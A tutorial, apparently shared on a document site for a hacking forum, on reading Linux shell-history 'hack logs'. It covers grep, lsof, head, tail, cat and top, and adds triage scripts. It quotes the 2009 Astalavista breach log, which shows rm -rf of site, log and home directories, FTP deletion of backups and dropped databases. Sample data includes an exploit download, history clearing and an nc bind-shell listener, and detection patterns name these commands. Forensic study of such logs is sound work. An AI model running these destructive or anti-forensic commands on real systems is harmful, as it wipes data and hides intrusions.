
This document has been written in response to a request on how to read a hack log (a Linux shell history file) for the members of Hackers Arena

This document provides instructions on how to read Linux hack logs to understand intrusions. It explains that hack logs record terminal commands and can reveal how a system was compromised. It then lists and describes useful commands for analyzing logs, including grep to search files, lsof to view open files and ports, head and tail to view the beginning and end of a file, cat to output file contents, and top to view running processes. It concludes by walking through an example hack log in which the attackers deleted website files, backups, user folders and log directories and dropped the site's databases to remove the compromised site completely.

Uploaded by Haarrvin Gvr
Copyright: © Attribution Non-Commercial (BY-NC)

This document has been written in response to a request on how to read a hack log (a Linux shell history file) for the members of HacKeRS ArEnA


Hack log -- Every command you type into bash is appended to a history file, ~/.bash_history. By default bash writes it when the shell exits, unless the attacker unsets HISTFILE or clears the history first. Once a system has been compromised and its databases dumped, that file is a record of how the hack went down, which is why such logs are often released afterwards with notes and comments. In other words: if you hack a Linux server without knowing how to erase your traces, the history file will get you caught. The commands below will help you read hack logs more easily.
Grep
$ grep [options] [pattern] [file]
Grep is a tool to search for strings in a file (and much more). Say you just downloaded a huge password dump and need to locate one specific account: grep is your tool. You can also pipe the output of another command into grep to narrow it down to only the lines you need; most distros highlight the matched string. Perhaps you need to find a specific Firefox process. You could type:
$ ps -e
and sift through the possibly long list it returns, or you can:
$ ps -e | grep [string]

Notice the pipe operator | is placed between the commands in the order the data should travel.
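As an added example (not part of the original post), here is the history-reading idea from the two sections above as a runnable script: it reads a .bash_history file, pairs each command with the "#<epoch>" timestamp line that bash writes in front of it when HISTTIMEFORMAT is set, and greps the result for the destructive and anti-forensic commands a hack log tends to contain. The sample history, the URL in it and the function names (hist_timeline, hist_flag_count, hist_flagged) are constructed for this example and come from nowhere on the page.

```shell
#!/bin/sh
# Added example for this page, not from the original post: triage a
# recovered .bash_history with plain awk and grep. Assumes the shell had
# HISTTIMEFORMAT set when it wrote the file, so every command is preceded
# by a "#<epoch seconds>" line; without it bash writes no timestamps at all.

# Constructed sample history (NOT a real capture); URL and names are made up.
HIST_FILE=$(mktemp)
cat > "$HIST_FILE" <<'EOF'
#1249500000
wget http://example.invalid/exp.c
#1249500020
gcc exp.c -o exp
#1249500031
./exp
#1249500090
rm -rf /var/log/
#1249500095
mysql -u root -p
#1249500200
unset HISTFILE
EOF

# Patterns seen in the log quoted on this page (rm -rf, drop database,
# mdelete) plus the usual history-clearing tricks.
FLAG_RE='rm -rf|drop database|mdelete|unset HISTFILE|history -c|HISTFILE='

# Print one "epoch<TAB>command" line per command. A command with no
# timestamp line in front of it (older history, or HISTTIMEFORMAT unset for
# part of the session) is marked "-" so the gap stays visible.
hist_timeline() {
    awk '
        /^#[0-9]+$/ { ts = substr($0, 2); next }
        { printf "%s\t%s\n", (ts == "" ? "-" : ts), $0; ts = "" }
    ' "$1"
}

# Number of history lines matching FLAG_RE. grep -c exits 1 on zero matches,
# so "|| true" keeps a set -e caller from aborting on a clean history.
hist_flag_count() {
    grep -c -E -i "$FLAG_RE" "$1" || true
}

# Only the flagged commands, with their timestamps, for the write-up.
hist_flagged() {
    hist_timeline "$1" | grep -E -i "$FLAG_RE" || true
}

hist_timeline "$HIST_FILE"
printf 'flagged commands: %s\n' "$(hist_flag_count "$HIST_FILE")"
hist_flagged "$HIST_FILE"
```

The epoch values convert with date -u -d @1249500090 on GNU systems. A history with no "#" lines at all means HISTTIMEFORMAT was never set: the commands are still there, but only their order survives, not when they ran.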

Lsof
$ lsof [options] [file]

Lsof lists open files. That might seem rather lackluster until you remember that in Linux everything is a file, network sockets included. You can see open TCP connections and listening ports with:
$ lsof | grep TCP

Notice how useful grep and pipes are? The same data (plus UDP sockets) comes from:
$ lsof -i
Add -n and -P to skip hostname and port-name lookups, and use -iTCP if you only want the TCP sockets.
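An added example, not from the original post, for the lsof step above. Because lsof is not installed everywhere and live output cannot be reproduced, the script runs the listening-socket filter over a constructed sample of lsof -nP -i output (the -n and -P flags stop lsof resolving hostnames and port names, so the columns stay stable). The process names, PIDs, addresses and the function names tcp_listeners and web_account_listeners are made up for the example.

```shell
#!/bin/sh
# Added example for this page, not from the original post. Works on a
# CONSTRUCTED sample of "lsof -nP -i" output; nothing here is a real capture.
# Column layout of lsof -i: COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME,
# with the TCP state in parentheses as a trailing field.

LSOF_FILE=$(mktemp)
cat > "$LSOF_FILE" <<'EOF'
COMMAND   PID   USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
sshd      812   root    3u  IPv4  11201      0t0  TCP *:22 (LISTEN)
httpd    1402 apache    5u  IPv4  11987      0t0  TCP *:80 (LISTEN)
mysqld   1500  mysql   10u  IPv4  12044      0t0  TCP 127.0.0.1:3306 (LISTEN)
httpd    1402 apache    9u  IPv4  13310      0t0  TCP 10.0.0.5:80->203.0.113.9:51234 (ESTABLISHED)
named     905  named   20u  IPv4  12990      0t0  UDP 127.0.0.1:53
nc       2201 apache    3u  IPv4  14421      0t0  TCP *:31337 (LISTEN)
EOF

# "lsof | grep TCP" as on the page, narrowed to sockets in LISTEN state.
# Prints "command pid user port"; the header, UDP sockets and established
# connections fall through the filter.
tcp_listeners() {
    awk '$NF == "(LISTEN)" && $(NF-2) == "TCP" {
        port = $(NF-1); sub(/^.*:/, "", port)
        print $1, $2, $3, port
    }' "$1"
}

# Listeners owned by the web-server account ($2) that are not the web server
# binary itself ($3). After a web-app compromise like the one in this write-up,
# a stray listener under that account (nc on 31337 in the sample) is the
# bind-shell pattern worth chasing first.
web_account_listeners() {
    tcp_listeners "$1" | awk -v acct="$2" -v web="$3" '$3 == acct && $1 != web'
}

tcp_listeners "$LSOF_FILE"
web_account_listeners "$LSOF_FILE" apache httpd
```

On a live box the same filter is lsof -nP -iTCP -sTCP:LISTEN; the awk version is only there so the logic can be checked against a fixed sample.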

Head and Tail
$ head [file]
$ tail [file]
These two commands show the first (head) and last (tail) ten lines of the specified file(s); -n changes the number of lines.

Here, we took the sqlmap.conf file and printed out its first and last ten lines. Often, once you've rooted a box, you already know the layout of certain log files and configs, and it is much faster to read them with these commands than to open each file in vim.

Cat
$ cat [options] [file]

Cat is short for concatenate; it prints a file to standard output, which is your terminal in most cases. This is useful when you need to view the contents of a small file quickly on the screen.

Top
$ top
Top displays running processes, uptime, load and more. It's useful for seeing what's running when you're performing recon on a server.

While top is running, press the 'h' key to bring up a help screen listing its interactive commands. Some of the more useful ones are:
u [username]  Display only the processes belonging to that user; enter + or leave it blank to see all users again.
k [pid]       Kill the process with that PID.

Let's take an example from the 2009 Astalavista hack by AntiSec. After exploiting their Light Speed HTTP daemon to get a shell as the Apache account, they used a local privilege escalation exploit to gain root. That is pretty much the end of the machine: once someone has escalated their privileges to root, they own the box. They can install rootkits, keyloggers, bots, deface the website, and so on. The relevant part of the log:

sh-3.2# rm -rf backup/
sh-3.2# rm -rf backup.14161/
sh-3.2# rm -rf ftp/
sh-3.2# rm -rf jon/
sh-3.2# rm -rf my/
sh-3.2# rm -rf mysqldata/
sh-3.2# rm -rf test/
sh-3.2# rm -rf tmp/
sh-3.2# cd ~
sh-3.2# rm -rf *
sh-3.2# rm -rf /var/log/
rm: cannot remove directory `/var/log//proftpd': Directory not empty
sh-3.2# rm -rf /home/*
ftp> cd astalavista.com
250 CWD command successful.
ftp> ls -la
[snip]
ftp> mdelete *
mysql> drop database astanet_membersystem;
mysql> drop database com_contrexx;
mysql> drop database com_contrexx2;
mysql> drop database com_contrexx2_live;
mysql> drop database ideapool;
mysql> drop database yourmaster;
mysql> drop database astanet_ads;
mysql> drop database astanet_mailing_lists;
mysql> drop database astanet_mediawiki;

Basically, they did the following:
1. Deleted the local website, scripts and pages.
2. Deleted the temp, test and log directories (note that /var/log was not fully removed because the proftpd directory was still in use).
3. Deleted the user folders under /home.
4. Connected to the FTP backup site and deleted the backups.
5. Connected to the database server and dropped every database behind the website (the log shows DROP DATABASE, not individual tables).

They removed any trace of this website.
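An added example, not part of the original post, that produces the "Basically, they did the following" summary above mechanically from the log itself. The input is the Astalavista log as quoted on this page with the prompt spacing normalized and nothing added; the script keys on the prompt at the start of each line (sh-3.2# for the root shell, ftp> for the FTP client, mysql> for the MySQL client) and ignores server replies and error lines, which carry no prompt. The function names session_commands, session_summary and dropped_databases are my own.

```shell
#!/bin/sh
# Added example for this page, not from the original post: summarize a
# captured attacker session by context (root shell / ftp / mysql) and
# destructive action. Input below is the log quoted on the page, re-spaced.

LOG_FILE=$(mktemp)
cat > "$LOG_FILE" <<'EOF'
sh-3.2# rm -rf backup/
sh-3.2# rm -rf backup.14161/
sh-3.2# rm -rf ftp/
sh-3.2# rm -rf jon/
sh-3.2# rm -rf my/
sh-3.2# rm -rf mysqldata/
sh-3.2# rm -rf test/
sh-3.2# rm -rf tmp/
sh-3.2# cd ~
sh-3.2# rm -rf *
sh-3.2# rm -rf /var/log/
rm: cannot remove directory `/var/log//proftpd': Directory not empty
sh-3.2# rm -rf /home/*
ftp> cd astalavista.com
250 CWD command successful.
ftp> ls -la
[snip]
ftp> mdelete *
mysql> drop database astanet_membersystem;
mysql> drop database com_contrexx;
mysql> drop database com_contrexx2;
mysql> drop database com_contrexx2_live;
mysql> drop database ideapool;
mysql> drop database yourmaster;
mysql> drop database astanet_ads;
mysql> drop database astanet_mailing_lists;
mysql> drop database astanet_mediawiki;
EOF

# Emit "context<TAB>command" for every prompted line, dropping the prompt.
# Lines without a prompt (250 replies, rm: errors, [snip]) are server output
# and are skipped, so they never count as attacker actions.
session_commands() {
    awk '
        /^sh-[0-9.]+# / { sub(/^sh-[0-9.]+# /, ""); printf "shell\t%s\n", $0; next }
        /^ftp> /        { sub(/^ftp> /, "");        printf "ftp\t%s\n",   $0; next }
        /^mysql> /      { sub(/^mysql> /, "");      printf "mysql\t%s\n", $0; next }
    ' "$1"
}

# Count destructive actions per context: shell rm -rf, ftp mdelete/delete,
# mysql DROP DATABASE/TABLE. Prints "context count", sorted by context.
session_summary() {
    session_commands "$1" | awk -F '\t' '
        $1 == "shell" && $2 ~ /^rm -rf/                          { n["shell rm -rf"]++ }
        $1 == "ftp"   && $2 ~ /^(mdelete|delete) /               { n["ftp delete"]++ }
        $1 == "mysql" && tolower($2) ~ /^drop (database|table) / { n["mysql drop"]++ }
        END { for (k in n) printf "%s %d\n", k, n[k] }
    ' | sort
}

# List the databases dropped, one per line, in the order they were dropped.
dropped_databases() {
    session_commands "$1" | awk -F '\t' '
        $1 == "mysql" && tolower($2) ~ /^drop database / {
            split($2, w, " "); name = w[3]; sub(/;$/, "", name); print name
        }
    '
}

session_summary "$LOG_FILE"
dropped_databases "$LOG_FILE"
```

The per-context counts line up with the five-point summary above: eleven rm -rf runs in the root shell, one mdelete on the FTP backup host, and nine DROP DATABASE statements, with the "Directory not empty" error correctly left out of the count.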

In Closing
Looking over the commands and the order they were run in will help make sense of what hacking really is. Hollywood and the media do a great job of making it seem like a few clicks of a mouse, a bunch of scrolling text, and some nefarious-looking teenager saying "we're in". If you read over the hack logs, you might have noticed that a lot of the work involved was actually on the databases
